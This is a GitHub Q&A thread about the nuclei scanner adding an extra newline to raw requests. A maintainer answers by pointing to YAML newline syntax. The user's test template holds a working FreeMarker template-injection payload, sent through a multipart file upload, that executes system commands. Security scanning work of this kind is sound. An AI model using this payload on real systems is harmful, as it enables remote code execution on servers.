### DISCUSSION TITLE
An additional end of line in RAW request

### DISCUSSION THREAD

**Discussion by niudaii** [projectdiscovery/nuclei#1423] [Q&A] [answered]
Like https://github.com/projectdiscovery/nuclei/issues/535
Hello, I found something wrong in my case.
In my case,
![image-20211223141532403](https://nnotes.oss-cn-hangzhou.aliyuncs.com/notes/image-20211223141532403.png)
![image-20211223141634274](https://nnotes.oss-cn-hangzhou.aliyuncs.com/notes/image-20211223141634274.png)
Test case,
```
requests:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------316085978974248253177894516

        -----------------------------316085978974248253177894516
        Content-Disposition: form-data; name="uploadFile"; filename="zpp.html"
        Content-Type: image/html

        ${site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.ObjectWrapper").getField("DEFAULT_WRAPPER").get(null).newInstance(site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.utility.Execute"), null)(cmd)}
        -----------------------------316085978974248253177894516
        Content-Disposition: form-data; name="typeStr"

        File
        -----------------------------316085978974248253177894516
        Content-Disposition: form-data; name="submit"

        Submit
        -----------------------------316085978974248253177894516
```
![image-20211223142531260](https://nnotes.oss-cn-hangzhou.aliyuncs.com/notes/image-20211223142531260.png)

**Comment by forgedhallpass** [comment, marked as answer]
@niudaii have you managed to resolve your issue?

Normally, you can control how the new line characters are handled, using in-built YAML syntax.

Please see: https://github.com/projectdiscovery/nuclei/discussions/1876#discussioncomment-2606726
